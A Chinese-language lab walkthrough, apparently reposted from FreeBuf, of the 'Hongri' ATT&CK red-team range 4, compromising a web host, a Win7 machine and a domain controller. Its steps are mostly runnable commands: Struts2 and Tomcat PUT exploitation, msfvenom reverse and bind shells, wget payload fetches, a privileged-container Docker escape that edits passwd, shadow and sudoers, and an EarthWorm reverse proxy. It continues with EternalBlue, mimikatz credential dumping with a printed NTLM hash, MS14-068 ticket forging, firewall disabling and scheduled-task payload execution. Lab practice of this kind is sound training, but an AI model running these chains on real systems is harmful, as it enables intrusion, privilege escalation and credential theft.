靶场搭建
靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/
共有三台主机DC、WEB、WIN7
机器密码
WEB主机 ubuntu:ubuntu
WIN7主机 douser:Dotest123
(DC)WIN2008主机 administrator:Test2008
网络配置
创建两个子网vmnet0和vmnet1
vmnet1:192.168.183.0
![图片[1]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659366633_62e7ece9a892f0bf40c65.png!small)
WEB主机网卡设置
![图片[2]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659366659_62e7ed03841d1116be0ed.png!small)
WIN7主机网卡设置
![图片[3]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659366680_62e7ed18108ef5c528a6f.png!small)
DC主机网卡设置
![图片[4]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659366695_62e7ed27810bcaed51156.png!small)
攻击机kali的网卡和WEB主机的第一章出网网卡一致为NAT模式
WEB主机(Ubuntu)
![图片[5]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659366716_62e7ed3c6b52a80a5f17e.png!small)
DC主机(Windows 2008)
![图片[6]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659366734_62e7ed4eaf52c6d12c38a.png!small)
WIN7
![图片[7]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659366808_62e7ed9842c1b5c93ede7.png!small)
WEB主机(Ubuntu)上启动环境
sudo docker start ec 17 09 bb da 3d ab ad
![图片[8]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659366830_62e7edae01fb1f87b9f72.png!small)
渗透测试
扫描端口开放情况
nmap -sS -p 1-65535 -A 192.168.48.146
端口22开放,存在SSH服务
2001,2002,2003端口开放,存在WEB
看到2001使用了Struts2中间件
2002使用了Apache Tomcat中间件
2003为Apache、PHPmyadmin、mysql
访问WEB
2001端口
![图片[9]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367141_62e7eee58ae2ec048ae94.png!small)
2002端口
![图片[10]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367158_62e7eef6006ae05c90a4b.png!small)
2003端口,发现不需要密码就可以进入phpmyadmin后台
![图片[11]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367176_62e7ef08941b56c5ef7c3.png!small)
利用Struts2漏洞获得shell
使用了Struts2
直接使用工具进行检测和利用
![图片[12]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367226_62e7ef3a8a933ecd62031.png!small)
![图片[13]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367241_62e7ef49812bd1ce4b08a.png!small)
![图片[14]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367703_62e7f117365d6edf4156a.png!small)
利用漏洞上传msf马
生成msf马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f jsp > shell.jsp
![图片[15]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367718_62e7f126ae99711dcf133.png!small)
![图片[16]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367763_62e7f153467d2d899ddf4.png!small)
![图片[17]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367777_62e7f1613631bda56d73a.png!small)
msf启动监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.48.136
exploit
访问马
![图片[18]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367919_62e7f1efebf80527c9b70.png!small)
成功收到会话
![图片[19]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659367951_62e7f20f4ae0ae7abc55a.png!small)
利用phpmyadmin后台获得shell
还可以利用phpmyadmin来使用数据库日志写入马来获得会话,这里就不做演示了,方法和之前的红日靶场一的一样,可以前往查看。链接:https://blog.csdn.net/weixin_45682839/article/details/123410686
利用Tomcat漏洞获得shell
还可以利用Tomcat CVE-2017-12615 任意文件写入
payload
PUT /1.jsp/ HTTP/1.1 Host: 192.168.3.103:2002 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 5
利用payload写入msf马
![图片[20]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368393_62e7f3c97fbf02fae99fe.png!small)
访问马
![图片[21]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368547_62e7f463b26cfe537183f.png!small)
成功获得会话
![图片[22]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368567_62e7f47759733273a4bdc.png!small)
内网渗透
在获得中打开shell
不是完整的shell,使用pyhton中的pty模块反弹一个完整的shell环境
python -c ‘import pty;pty.spawn(“/bin/bash”)’
![图片[23]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368640_62e7f4c0e75be2c4b2531.png!small)
进行信息搜集
![图片[24]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368670_62e7f4deeb4c7eb0c85b9.png!small)
查看系统进程的cgroup信息
![图片[25]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368687_62e7f4efdcf90cd743a33.png!small)
ls -alh /.dockerenv
![图片[26]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368709_62e7f5054af27dbd109a2.png!small)
![图片[27]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368729_62e7f5190eb71ea47c80c.png!small)
![图片[28]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368739_62e7f5234a4b01eafdffa.png!small)
![图片[29]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368754_62e7f53255c6c09ea818c.png!small)
发现为Docker环境
Docker逃逸
利用dirty cow来进行docker逃逸
这种利用方法利用成功的前提是,宿主机的内核有dirty cow漏洞。
git clone https://github.com/scumjr/dirtycow-vdso.git
cd dirtycow-vdso
make
在目标主机上无法进行make编译,我们在攻击机kali上编译之后通过kali临时搭建一个python网站
python -m SimpleHTTPServer 80
![图片[30]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368851_62e7f59372138d317e7d8.png!small)
在目标主机上使用命令下载编译好的文件
wget http://192.168.48.136/0xdeadbeef
192.168.48.136位kali的ip
![图片[31]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368881_62e7f5b1cf2b6cc9d72a3.png!small)
利用工具反弹shell到本地主机
chmod +x 0xdeadbeef
./0xdeadbeef ip:port #反弹shell到指定主机的指定端口
./0xdeadbeef 127.0.0.1 1234
![图片[32]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659368983_62e7f61758811fa766691.png!small)
利用失败,不存在dirtycow漏洞
换另一种方式进行docker逃逸
利用特权模式进行逃逸
使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。
查看磁盘文件
fdisk -l
在这里发现一个问题,通过Struts2获得的shell,的磁盘文件为空,所以利用不了
![图片[33]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659369325_62e7f76d037774d05f9ab.png!small)
但是通过Tomcat获得的shell就可以利用
![图片[34]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659369340_62e7f77c31af8fb74645c.png!small)
创建一个文件夹,将宿主机根目录挂载至容器目录下
mkdir /out
mount /dev/sda1 /out
![图片[35]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659369432_62e7f7d87e7823e500ddb.png!small)
![图片[36]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659369451_62e7f7eb9b3955e669bd2.png!small)
添加账号密码通过ssh进行登录
echo “qwe1:x:1006:1006:qwe1,,,:/home/qwe1:/bin/bash” >> test/etc/passwd
echo “qwe1:$1$xJbww$Yknw8dsfh25t02/g2fM9g/:18381:0:99999:7:::” >> test/etc/shadow
![图片[37]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659369477_62e7f805974150c4ec557.png!small)
一直提示密码不正确,试了很多遍都是这样
通过写入ssh秘钥
在kali上生成秘钥
ssh-keygen -t rsa (密码为空)
![图片[38]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220801/1659369501_62e7f81d38c2044d7d4ed.png!small)
> out1/home/ubuntu/.ssh/authorized_keys”,”marks”:[{“type”:”inlineCode”}]}]}],”state”:{}}]’>
将生成的公钥写入目标主机
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0y3RzGTTLabQjOv0QALZnrPq1Rf2gGOwNZ+AIGVGHHVWun5MZhJRo+FBGhAVrFIwvYchZzKRs8T8W7YmsSBHykKMR6LfpYl1QOXop2eCSOTwj8dfYgPFv22d7pdYK4Vicmwu9RIpcqAdrZ1E0N+WgdIxDz7/rHi9Tku7o2DkFekvMM6UOkmGo7CL0C17iAyRmAlIOBV/+oz6MdPQOSJ4BpcvS6U9kS3dJli8fNDylt+wWH4Uh5CbuJnfJDiOkm+Tvxw6qBpv9t5v1iWK3cXwFc60g2oGm68fuBV1mrLEQQVdcpj8xczWfMzJFOxWBHSVWWcwHT7L+BI6SKvXtOlLtRJbZ+KtKBGXRF/XKMyjjtd35b5Ol5Ounn7OEqrE1/epQbJ7NjDj2apNcpg+xIZQpLJIj9qREDdtpkFmii8XsZnZr/uBy2D5wUMpFinE9RMGoqcxj1BWIXclrQy94e1Vjyd6n/JtirspLMNOhSxjNuydewq0pd9VwQkcEhYaIZ9U= root@kali' >> out1/home/ubuntu/.ssh/authorized_keys
写入后进行登录(免密登录),试了很多次也没有成功
又试了写入计划任务外连,也没有成功
这里只好直接用Ubuntu密码直接登录ssh了
![图片[39]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369627_62e7f89be1243f433753d.png!small)
普通用户权限
![图片[40]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369644_62e7f8acafa9932353e74.png!small)
提权
ubuntu是用命令行执行命令,在普通用户下的操作很受限,无法变成管理员权限,所以需要在一个文件/etc/sudoers处加入普通用户的放行语句,才可以让普通用户在ssh的情况下进行提权。
echo ‘ubuntu ALL=(ALL:ALL) ALL’ >> out/etc/sudoers
(在docker中的shell中执行)
sudo su root
![图片[41]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369736_62e7f90898753f151ef58.png!small)
上传msf马,获得msf会话
生成msf马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f elf > shell.elf
启动临时网站
python -m SimpleHTTPServer 80
将msf马下载到目标主机
wget http://192.168.48.136/shell.elf
![图片[42]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369764_62e7f9241f0b8a04d94f7.png!small)
msf进行监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.48.136
exploit
执行msf马,成功收到会话
![图片[43]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369790_62e7f93e5dbe2f21e84e7.png!small)
![图片[44]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369803_62e7f94bdc9414977ba5e.png!small)
内网信息搜集
ifconfig
![图片[45]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369825_62e7f9611d9cec7c03be8.png!small)
发现内网网卡
添加路由建立代理
route add 192.168.183.0 255.255.255.0 2
![图片[46]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369845_62e7f975388b19bc2e213.png!small)
利用earthworm建立代理
在kali上执行命令
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
在目标主机上上传ew_for_linux64
执行命令
./ew_for_linux64 -s rssocks -d 192.168.48.136 -e 1234
![图片[47]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369876_62e7f994a4531b22f14a6.png!small)
vi /etc/proxychains4.conf
![图片[48]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369893_62e7f9a57c40648e25566.png!small)
测试代理是否创建成功
ping 192.168.183.128
![图片[49]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369915_62e7f9bb0e7e4713523ec.png!small)
内网存活主机探测
use auxiliary/scanner/discovery/udp_probe
set RHOSTS 192.168.183.0/24
set THREADS 5
exploit
![图片[50]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369948_62e7f9dca9c6d8b01b788.png!small)
发现两台主机:
192.168.183.130 WIN-ENS2VR5TR3N
192.168.183.128 TESTWIN7-PC
横向移动
扫描内网主机端口开放情况
nmap -sS -p 1-65535 -A 192.168.183.130
![图片[51]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659369974_62e7f9f6ef2d71c6237c8.png!small)
![图片[52]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370001_62e7fa11ac9bba0de4999.png!small)
发现130主机为域控,域名为demo.com
nmap -sS -p 1-65535 -A 192.168.183.128(因为-A全扫描太费时间了,这里第二个就不用了)
![图片[53]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370086_62e7fa669256876be7d46.png!small)
两台主机都开放了445端口,试一下使用永恒之蓝
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.183.132(我这里win7主机中途重启了,IP地址改变了,之前是128)
![图片[54]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370121_62e7fa8932373cc1d3999.png!small)
set RHOSTS 192.168.183.130
![图片[55]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370138_62e7fa9a423a038a4e6be.png!small)
两台主机都存在永恒之蓝,利用
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.183.135(重启了,ip地址又改变了,现在135是win7)
试了好几遍都没有成功,后来发现是本机的的火绒给拦截了,关闭火绒后就成功了
![图片[56]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370163_62e7fab380d98b9e69990.png!small)
成功拿下WIN7主机
![图片[57]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370199_62e7fad714a33f7d662be.png!small)
Windows2008试了好几次,然后打蓝屏了,没有拿下,换个模块试试
use exploit/windows/smb/ms17_010_psexec
还是不行
换其它方式
回到WIN7会话,进程迁移
migrate PID
![图片[58]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370228_62e7faf4a60b5c5982385.png!small)
使用mimikatz,也可以使用msf中的mimikatz(在高版本msf中被kiwi取代)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
mimikatz工具这台主机桌面上已经有了,靶场搭建者准备好的
![图片[59]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370259_62e7fb13107e240f9b7bd.png!small)
USER:douser
Domain:DEMO.COM
NTLM:bc23b0b4d5bf5ff42bc61fb62e13886e
SID:S-1-5-21-979886063-1111900045-1414766810-1107
PASSWORD:Dotest123
利用Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324)来获得域控。
该漏洞可导致活动目录整体权限控制受到影响,允许攻击者将域内任意用户权限提升至域管理级别。通俗地讲,如果攻击者获取了域内任何一台计算机的Shell权限,同时知道任意域用户的用户名、SID、密码,即可获得域管理员权限,进而控制域控制器,最终获得域权限。
使用PyKEK可以生成一张高权限的服务票据,并通过mimikatz将服务票据注人内存。
使用PyKEK,可以将Python文件转换为可执行文件(在没有配置Python环境的操作系统中也可以执行此操作,在这台靶机中靶场搭建者已经给大家准备好了可执行文件版的MS14-068.exe)
微软针对MS14-068 ( CVE-2014-6324)漏洞提供的补丁为KB3011780
操作步骤
1、生成高权限票据
MS14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u douser@DEMO.COM -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
![图片[60]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370296_62e7fb3825d2d7b897516.png!small)
2、查看注入前的权限
将票据文件复制到Windows Sever 2008机器的mimikatz目录下,使用mimikatz将票据注入内存。输入命令“net use \\WIN-ENS2VR5TR3N\c$”,提示“Access is denied”,表示在将票据注入前无法列出域控制器C盘目录的内容。
![图片[61]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370316_62e7fb4c33d41565ecc5b.png!small)
3、清除内存中的所有票据
打开mimikatz
输入kerberos::purge
当看到”Ticket(s) purge for current session is OK’时,表示清除成功
![图片[62]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370344_62e7fb687d0dba99bd352.png!small)
4、将高权限的票据注入内存
kerberos::ptc “TGT_user1@pentest.com.ccache”(双引号里面的是票据的名字)
kerberos::ptc “TGT_douser@DEMO.COM.ccache”
![图片[63]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370367_62e7fb7f569ea47c20a3d.png!small)
注入成功
![图片[64]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370385_62e7fb91252ad7709e98e.png!small)
![图片[65]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370399_62e7fb9f9d41b20c084a2.png!small)
生成一个msf马通过文件共享上传至域控主机
首先关闭WIN7防火墙
NetSh Advfirewall set allprofiles state off
![图片[66]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370419_62e7fbb3844c6cf125d0e.png!small)
生成msf bind马
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.183.130 LPORT=7777 -f exe > shell.exe
开启WIN7 3389远程连接用于上传文件
wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1
![图片[67]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370462_62e7fbde481a73afc9b37.png!small)
在WIN7上创建新的用户并加入到管理员组
net user aaa qwe123!asd /add
![图片[68]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370486_62e7fbf6833c515bbfc45.png!small)
net localgroup administrators aaa /add
![图片[69]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370511_62e7fc0f45f6e0288602c.png!small)
通过远程桌面上传msf马到域控
在kali上输入命令
rdesktop 192.168.183.137 -r disk:wj=/root
-r 为指定共享的磁盘
用刚才添加的账号登录
![图片[70]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370536_62e7fc281c53ec8336290.png!small)
![图片[71]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370553_62e7fc39a9dd90be6b108.png!small)
将刚生成的msf马复制到WIN7中
![图片[72]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370574_62e7fc4e0239e1bdf820d.png!small)
再通过文件共享将马复制到域控中
copy shell.exe \\WIN-ENS2VR5TR3N\c$
![图片[73]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370595_62e7fc634686a7fe8499e.png!small)
schtasks /create /S WIN-ENS2VR5TR3N /TN “test” /TR c:/shell.exe /SC MINUTE /ST 21:27 /ru system /f
![图片[74]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370612_62e7fc74dad1fd7d0b496.png!small)
msf开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.183.130
set LPORT 7777
exploit
等了很久没有收到会话,在域控上看到7777端口处于监听模式,证明计划任务执行成功,没有收到会话肯定是因为防火墙拦截了
![图片[75]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370650_62e7fc9a32928e38339b3.png!small)
再创建一个计划任务关闭防火墙
echo NetSh Advfirewall set allprofiles state off >> 1.bat
![图片[76]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370669_62e7fcadeb4867ec6e885.png!small)
copy 1.bat \\WIN-ENS2VR5TR3N\c$
![图片[77]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370687_62e7fcbfbbaa4223fd384.png!small)
schtasks /create /S WIN-ENS2VR5TR3N /TN “test1” /TR c:/1.bat /SC ONCE /ST 21:57 /ru system /f
![图片[78]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370706_62e7fcd2b30f867fe99ad.png!small)
成功收到会话
![图片[79]-ATT&CK红队评估(红日靶场四)-NGC660安全实验室](https://image.3001.net/images/20220802/1659370721_62e7fce1e0fd31d6e8a17.png!small)
本文作者:xiaopanghacker, 转载请注明来自FreeBuf.COM
请登录后查看评论内容